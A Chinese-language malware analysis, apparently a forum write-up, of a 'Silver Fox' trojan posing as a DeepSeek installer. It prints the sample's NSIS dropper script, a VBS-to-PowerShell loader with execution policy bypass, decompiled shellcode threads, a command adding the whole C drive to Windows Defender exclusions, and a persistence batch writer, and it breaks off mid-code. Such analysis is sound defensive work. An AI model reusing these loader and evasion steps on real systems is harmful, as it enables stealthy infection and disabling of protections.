背景

近期，AI大模型领域热度飙升，DeepSeek等开源大模型成为开发者与普通用户的热门选择。攻击者敏锐捕捉到这一趋势，将恶意软件伪装成"DeepSeek大模型自动安装助手"，利用用户对技术工具的迫切需求实施精准社工攻击。"银狐"家族作为长期活跃的APT组织，擅长通过热点事件伪造合法软件，此次攻击是其新型社会工程学策略的典型体现，该样本来源银狐突袭！DeepSeek本地化部署暗藏“致命陷阱”。


2.恶意文件分析

拖入die中，发现是由nsis打包而成的
使用7zip-nsis解包
其中.nsi文件为安装配置，关键部分如下。在$APPDATAAxialis目录释放文件之后，执行Decision.vbs，然后再将真正的ds大模型安装助手的快捷方式放置于桌面 复制代码 隐藏代码Section MainSection ; Section_0; AddSize 136708Sleep 500SetOutPath $APPDATAAxialisSleep 500File Config.iniSleep 500File Config2.iniSleep 500File silently.ps1Sleep 500File Update.dllSleep 500File Decision.vbsSleep 500Exec "wscript //B $"$APPDATAAxialisDecision.vbs$""SetOutPath $INSTDIRSleep 500Sleep 500SetOverwrite ifnewerFile ds大模型安装助手_1.0.0.6_1740119628.exeSleep 500CreateShortCut $DESKTOPds大模型安装助手_1.0.0.6_1740119628.lnk $INSTDIRds大模型安装助手_1.0.0.6_1740119628.exeSectionEnd
2.1程序执行流程



2.2程序分析

2.2.1关联启动恶意进程

解包后$APPDATAAxialis目录下为后门程序
首先是Decision.vbs,用于启动同路径下的silently.ps1文件
复制代码 隐藏代码Set objShell = CreateObject("WScript.Shell")RoamingPath = objShell.ExpandEnvironmentStrings("%APPDATA%")FilePath = RoamingPath & "Axialissilently.ps1"objShell.Run "C:WindowsSysWow64WindowsPowerShellv1.0powershell.exe -ExecutionPolicy Bypass -File """ & FilePath & """", 0, False
silently.ps1文件内容如下，用于启动同路径下的Update.dll的导出函数TCGamerUpdateMain 复制代码 隐藏代码$RoamingDir = ::GetFolderPath('ApplicationData')$DllPath = Join-Path $RoamingDir "AxialisUpdate.dll"$DllPathEscaped = $DllPath -replace '\', '\\'$code = @"using System;using System.Runtime.InteropServices;public class DllInvoker{$DllPathEscaped", CallingConvention = CallingConvention.Cdecl)]public static extern void TCGamerUpdateMain();}"@Add-Type -TypeDefinition $code::TCGamerUpdateMain()
首先创建互斥体保证只有一个实例运行，然后获取C:UsersusernameAppDataRoamingAxialis 这个路径下的Config2.ini文件。
然后在内存中加载shellcode
shellcode创建线程执行操作
复制代码 隐藏代码int sub_10014540(){int v0; // eaxint v1; // eaxv0 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v0);((void (__stdcall *)(_DWORD, _DWORD, int (__usercall *)@(int@), _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,sub_10013F20,0,0,0);((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,&sub_1000A9F0,0,0,0);((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,&sub_100137E0,0,0,0);((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,&sub_10014390,0,0,0);((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(0,0,&sub_100142F0,0,0,0);v1 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v1);((void (*)(void))byte_10013450)();((void (__stdcall *)(_DWORD))unk_1001DC47)(0);return 0;}
2.2.2线程1：将c盘添加到杀软白名单

通过执行指令powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"将c盘添加到windows defender白名单中 复制代码 隐藏代码int __usercall sub_10013F20@(int a1@){v37 = a1;v38 = retaddr;v36 = -1;v35 = &unk_10032941;ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;*(_DWORD *)&v33[1] = &v39;v28 = sub_10007310((char *)&v29 + 1);qmemcpy(v30, "powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"", sizeof(v30));---------------------------------省略部分内容----------------------------------------qmemcpy(v32, "/C ", sizeof(v32));---------------------------------省略部分内容----------------------------------------((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(v13, 0, 56);v13[0] = 64;v13[1] = 0;v13[2] = "open";v13[3] = "cmd.exe";v13[4] = string(v11);v13[5] = 0;v13[6] = 0;if ( ((int (__stdcall *)(int *))shell32_ShellExecuteEx)(&v12) && v14 ){((void (__stdcall *)(int, int))kernel32_WaitForSingleObject)(v14, -1);((void (__stdcall *)(int))kernel32_CloseHandle)(v14);}return maybe_alloc(v11);}
2.2.3线程2：创建守护进程

执行流程如下
写入monitor.bat并执行
复制代码 隐藏代码int __cdecl sub_10002D00(void *a1){((void (__stdcall *)(int, _BYTE *))kernel32_GetTempPathA)(260, v6);str_addr = get_str_addr(v11, (int)v6);v22 = str_addr;v24 = 0;str_concat((int)v13, str_addr, (int)"target.pid");LOBYTE(v24) = 2;maybe_alloc(v11);v21 = get_str_addr(v10, (int)v6);v20 = v21;LOBYTE(v24) = 3;str_concat((int)v14, v21, (int)"monitor.bat");LOBYTE(v24) = 5;maybe_alloc(v10);create_file(v12, v14, 2, 64, 1);LOBYTE(v24) = 6;if ( (unsigned __int8)((int (__thiscall *)(char *))judge_exist)(v12) ){((void (__cdecl *)(char *, const char *))write)(v12, "@echo offn");((void (*)(char *, const char *, ...))write)(v12, "set "PIDFile=%TEMP%\target.pid"n");v1 = ((int (__cdecl *)(char *, const char *))write)(v12, "set "VBSPath=");v2 = write_2(v1, a1);((void (__cdecl *)(int, void *))write)(v2, &unk_1003ACB8);((void (*)(char *, const char *, ...))write)(v12, "set /p pid= nuln");((void (__cdecl *)(char *, const char *))write)(v12, "if errorlevel 1 (n");((void (*)(char *, const char *, ...))write)(v12, "cscript //nologo "%VBSPath%"n");((void (__cdecl *)(char *, const char *))write)(v12, "exi